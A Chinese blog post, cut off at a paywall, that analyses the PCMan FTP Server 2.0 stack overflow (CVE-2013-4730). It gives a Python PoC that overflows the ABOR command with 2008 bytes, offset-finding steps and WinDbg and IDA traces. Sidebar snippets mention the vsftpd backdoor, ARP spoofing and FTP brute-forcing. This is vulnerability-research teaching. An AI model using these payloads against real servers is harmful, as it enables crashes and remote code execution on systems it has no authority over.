PCMan FTP Server缓冲区溢出漏洞分析与利用

最新推荐文章于 2023-04-22 16:34:44 发布
最新推荐文章于 2023-04-22 16:34:44 发布
阅读量4.9k 收藏 2
点赞数 1
分类专栏: 漏洞分析与利用 pwn 文章标签: 漏洞分析与利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012763794/article/details/66477993
版权

简要介绍

这个软件是台湾国立阳明大学医学系的一个学生在大四的时候写的,这个漏洞是有CVE的(CVE-2013-4730),软件应该还挺普及的,这是一个缓冲区溢出漏洞
具体exp可以点这里
实验用poc(其实这里直接对USER命令溢出都是可以的,即不用知道账号密码即可远程代码执行,USER命令的buf距离返回地址是2000

import socket as s
from sys import argv
#
if(len(argv) != 4):
    print "USAGE: %s host <user> <password>" % argv[0]
    exit(1)
else:
    #store command line arguments
    script,host,fuser,fpass=argv
    sploit = "A" * 2008    
    #create socket
    conn = s.socket(s.AF_INET,s.SOCK_STREAM)
    #establish connection to server
    conn.connect((host,21))
    #post ftp user
    conn.send('USER '+fuser+'\r\n')
    #wait for response
    uf = conn.recv(1024)
    #post ftp password
    conn.send('PASS '+fpass+'\r\n')
    #wait for response
    pf = conn.recv(1024)
    #send ftp command with sploit
    conn.send('ABOR '+sploit+'\r\n')
    cf = conn.recv(1024)
    #close connection
    conn.close()

实验环境

WinXP sp3 中文版
PCMan FTP Server 2.0
immunity debugger
windbg
mona

漏洞分析

如果我们在xp运行作者的exp就会出现
"0x41414141"指令引用的"0x41414141"内存.该内存不能为"read"

我们分析可以从下面几个方面入手
1. 通过栈回溯,找到漏洞发生前的函数调用,借助ida分析即可(这个需要通过计算buffer距离返回地址的个数,使用适当的payload,不然会覆盖之前的函数调用)
2. 基于污点追踪的分析方法
3. 由于这是个ftp程序,会接收用户输入的命令及参数,应该会调用recv函数,我们可以在recv函数下断点,一步步看看到哪个函数崩溃了

基于栈回溯的分析方法

首先我们要定位返回地址
!mona pattern_create 2020
运行后我们看到了返回地址覆盖成了0x43386f43
!mona pattern_offset 0x43386f43
算到是2004,即2005 - 2008就是返回地址位置
那我们发2008个A过去吧
windbg附加,运行,发送payload,但还是看不到之前的函数调用

0:002> g
(f40.f48): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=00000000 edx=0000000c esi=0012edc4 edi=00000004
eip=41414141 esp=0012edb8 ebp=00aa17a0 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
41414141 ??              ???
0:000> kv
ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
0012edb4 00000000 00000000 00000001 524f4241 0x41414141

既然这样的话,我们就基于污点(其实通过od或者直接dd esp可以判断出来一些返回地址的)

基于污点追踪的分析方法

我们看看崩溃后的栈前后,前面的0x41应该是复制后的0x41,后面的0x41应该是用户端传过来保存在栈上的

0:000> dd esp -20
0012ed98  41414141 41414141 41414141 41414141
0012eda8  41414141 41414141 41414141 00000a0d
0012edb8  00000402 00000000 00000001 524f4241
0012edc8  41414120 41414141 41414141 41414141
0012edd8  41414141 41414141 41414141 41414141
0012ede8  41414141 41414141 41414141 41414141
0012edf8  41414141 41414141 41414141 41414141
0012ee08  41414141 41414141 41414141 41414141

那我们尝试在0012ed98 这个地址下写入断点,当然你在0012edb4之前有0x41的地址下都可以

0:000> ba w4 0012ed98 ".if(poi(0012ed98)==0x41414141){}.else{gc}"
0:000> bl
 0 e 0012ed98 w 4 0001 (0001)  0:****  ".if(poi(0012ed98)==0x41414141){}.else{gc}"
0:000> g
*** WARNING: Unable to verify checksum for E:\PCManFTP\PCManFTPD2.exe
*** ERROR: Module load completed but symbols could not be loaded for E:\PCManFTP\PCManFTPD2.exe
eax=00000041 ebx=00000018 ecx=0012e544 edx=0012ed9b esi=0012f589 edi=0012e518
eip=004173af esp=0012e2a4 ebp=0012e2a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
PCManFTPD2+0x173af:
004173af ff01            inc     dword ptr [ecx]      ds:0023:0012e544=0012ed9b

我们再看看汇编窗口,就是这条语句的复制的0x41
004173ad 8802 mov byte ptr [edx],al
用ida看看

 int __cdecl write_char(int a1, FILE *a2, int a3)
{
  bool v3; // sf@1
  int v4; // eax@2
  bool v5; // zf@4
  int result; // eax@4

  v3 = a2->_cnt-- - 1 < 0;
  if ( v3 )
  {
    v4 = _flsbuf(a1, a2);
  }
  else
  {
    *a2->_ptr++ = a1;                           // 这里复制0x41到栈上
    v4 = (unsigned __int8)a1;
  }
  ......
}

我们看看此时的栈

0:000> kv
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
0012e2a4 00417428 00000041 0012e544 0012e518 PCManFTPD2+0x173af
0012e52c 00412ced 0012e544 004416f6 0012e594 PCManFTPD2+0x17428
0012e564 00403eeb 0012e5b0 004416d4 000007e1 PCManFTPD2+0x12ced
0012e568 0012e5b0 004416d4 000007e1 00000003 PCManFTPD2+0x3eeb
0012e56c 004416d4 000007e1 00000003 0000001a 0x12e5b0
0012e5b0 322f332f 325b2036 37313a30 3028205d PCManFTPD2+0x416d4

我们看到第一行返回地址00417428,通过ida看是在write_string函数内,再看看再上一层的返回地址00412ced,是在sprintf函数内(有种成功的预感),继续看上一层返回地址00403eeb,我们看看这个地址所在函数

struct CWinThread *__thiscall sub_403E60(_DWORD *this, _BYTE *a2)
{
  ......
  v2 = this;
  if ( dword_443540 || (result = (struct CWinThread *)dword_443548) != 0 )
  {
    GetLocalTime(&SystemTime);
    v4 = v2[9];
最低0.47元/天 解锁文章
giantbranch
关注
专栏目录
漏洞分析PCMan FTP Server缓冲区溢出漏洞分析利用 (CVE-2013-4730)
Hades的博客
05-24 3871
PCMan FTP Server缓冲区溢出漏洞分析利用(CVE-2013-4730)                                                                                                        作者:Hades0x0. 漏洞等级软件名称:PCMan FTP Server 软件版本:2.0.7 漏...
4.1、漏洞利用-FTP漏洞
c10udz的博客
09-04 2198
ftp协议:文件传输协议,使用客户/服务器(C/S)模式,用于Internet上的控制文件的双向传输(上传下载),属于网络传输协议的应用层,使用21号端口。nmap --script vuln -p 21 192.168.12.129 //漏洞探测。nmap -p 21 192.168.12.129 //扫描靶机21端口是否开启。攻击机:kali、IP=192.168.12.128。//使用nc登录靶机,密码可为空或任意,大小写皆可。FTP文件传输格式:(1)ASCII(2)二进制。
FTP漏洞利用
weixin_49340699的博客
10-23 2259
FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。 可他有一个不可避免的漏洞那就是FTP用户名明文密码验证。 FTP协议用于用户认证时客户端和服务器是通过明文进行交互的。 实验 先使用kali连接靶机的21端口 同时打开wireshark抓包ftp 可以发现传输是明文 则我们就可以使用工具arpspoof进行arp嗅探冒充网关对目标ip为192.168.19.106的主机进行arp欺骗 arpspoof -i eth0 192.168.1.1 -t
漏洞利用FTP漏洞利用
Myu_wzy的博客
09-23 832
一、实验原理 由于FTP没有禁止匿名用户,所以可以直接使用Anonymous用户直接登录FTP服务器。 二、实验环境 目标主机: Metasploit2虚拟机 192.168.20.143 攻击主机: Kali2虚拟机 192.168.20.133 三、匿名用户登录 扫描目标主机21端口:nmap -p 21 192.168.20.143 使用nc 连接ftp:nc 192.168.20.143 21 #密码可以任意输入 ...
漏洞分析报告-PCManFTP v2.0(CVE-2013-4730)
dbhri9673的博客
05-30 216
PCManFTP v2.0(CVE-2013-4730)漏洞分析报告 软件名称:PCManFTP 软件版本:2.0 漏洞模块:PCManFTPD2.exe 模块版本:2.0.0.0 编译日期:2005-01-01 操作系统:Windows XP/2003/7/8.1/10 漏洞编号:CVE-2013-4730 危害等级:高危...
实战教程:挖掘PCMan FTP服务器溢出漏洞分析
实验内容主要围绕PCMan FTP Server 2.07版本中的一个特定缓冲区溢出漏洞展开,这个漏洞是由Ottomatik在2013年8月20日在exploit-db.com上公开的。 PCMan是一款免费的、针对BBS优化的Telnet软件,由洪任谕开发,在...
PCMan-FTP+溢出脚本
01-17
PCMan-FTP是一款流行的开源FTP(File Transfer Protocol)服务器软件,由于其在设计或实现上的某些缺陷,可能会存在安全漏洞,尤其是缓冲区溢出问题。冰河大神,作为网络安全领域的知名专家,分享了这个溢出脚本,...
漏洞分析报告-FTP.docx
10-24
PCMan's FTP Server v2.0.0版本中,程序在处理客户端发送的USER命令时,未能正确地对数据长度进行限制,导致了缓冲区溢出的发生。具体来说,远程攻击者可以通过发送含有过长字符串的USER命令来触发此漏洞,进而...
6-1漏洞利用-FTP漏洞利用
山兔的博客
06-30 4141
文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。FTP使用21号端口。FTP在传输时,需要对应的用户用户分类:1、Real用户管理者在管理FTP服务器,为每一个用户创建对应名称的real用户或者是它有自己名称的用户,我们用户登录FTP服务器时,使用的是real用户的账号密码,这个时候,我们登录只能查看自己所在文件夹的内容,不能查看其它文件夹2、Administrator管理员登录之后,
ftp溢出工具.适用于所有5.0以下的版本.
12-03
ftp溢出工具.适用于所有5.0以下的版本.
windows下FTP匿名登录或弱口令漏洞及服务加固
01-10
漏洞描述 FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。 漏洞危害 黑客利用弱口令或匿名登录漏洞直接登录 FTP 服务,上传恶意文件,从而获取系统权限,并可能造成数据泄露。 加固方案 不同 FTP 服务软件可能有不同的防护程序,本修复方案以 Windows server 2008 中自带的 FTP 服务和 Linux 中的vsftpd服务为例,您可参考以下方案对您的 FTP 服务进行安全加固。 重要提示: 请确保您的 FTP 服务软件为官方最新版本。同
linux ftp漏洞利用,tnftp ftp客户端任意命令执行漏洞(CVE-2014-8517)
weixin_34800530的博客
05-05 645
发布日期:2014-10-29更新日期:2014-10-30受影响系统:NetBSD tnftp描述:CVE(CAN) ID: CVE-2014-8517tnftp是广泛使用的NetBSD FTP客户端。tnftp存在安全漏洞导致攻击者可以执行任意命令。此漏洞影响多个版本Linux(Fedora, Debian, NetBSD, FreeBSD, OpenBSD)及Apple Yosemite 1...
FTP-利用FTP后门漏洞
Myu_wzy的博客
09-24 877
一、实验原理 vsftpd手工触发漏洞: 当进行FTP认证时,如果用户名USER中包含" :) ",那么直接就触发监听6200端口的连接的shell 二、实验环境 目标主机:Metasploit2虚拟机 192.168.20.143 攻击主机: Kali2虚拟机 192.168.20.133 三、实验过程 先用nc连接靶机,并在进行FTP认证时,用户名包含" :) " 此时靶机的6200端口已经开启 由于nmap进行自动扫描时,默认不会扫描6200端口,所以需要我们手动扫描6.
PCManFTP v2.0(CVE-2013-4730)漏洞分析
datouyu0824的博客
03-21 791
1. 软件简介 PCMan's FTP Server是洪任谕程序员所研发的一套FTP服务器软件。该软件具有体积小、功能简单等特点。 2. 漏洞成因 PCMan's FTP Server 2.0.0版本中存在缓冲区溢出漏洞。 该软件由于未能有效处理FTP命令的长度字符(最大0x1000),进而在调用字符串拷贝函数时(和sprintf功能相同)未判断长度引发栈溢出漏洞,导致攻击者可以远程执行任何命令。 用于FTP登录的“USER”命令即可以触发此漏洞,也就是可以在未获取FTP的访问权限的前提下,就
kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机(笑脸漏洞
最新发布
qq_58018041的博客
04-22 4133
#vsftpd源码包含后门漏洞#思路:开放21端口,并且vsftpd版本号为2.3.4#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。攻击机:kali :192.168.111.128靶机:Metasploitable2-Linux:192.168.111.132Metasploitable 的用户名和密码均为:msfadmin。
PCManFTP v2.0漏洞分析
ZK_1874的博客
10-28 599
PCManFTP v2.0漏洞分析
4.2、漏洞利用-FTP不可避免的问题
c10udz的博客
09-12 614
medusa -h 192.168.x.xx -u admin -P /root/桌面/pass.txt -M ftp。(1)利用metasploit创建反弹shell上传到FTP服务器,可以利用setookit快速生成反弹shell。注释:-h指定主机,-u指定单个用户,-U指定用户字典,-p指定密码,-P指定密码字典,-M指定破解的类型。ftp使用明文进行客户端和服务端的通信,可利用wireshark抓包查看。注释:-i指定网卡网关,-t指定所要欺骗的目标主机。(2)添加FTP服务器用户。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值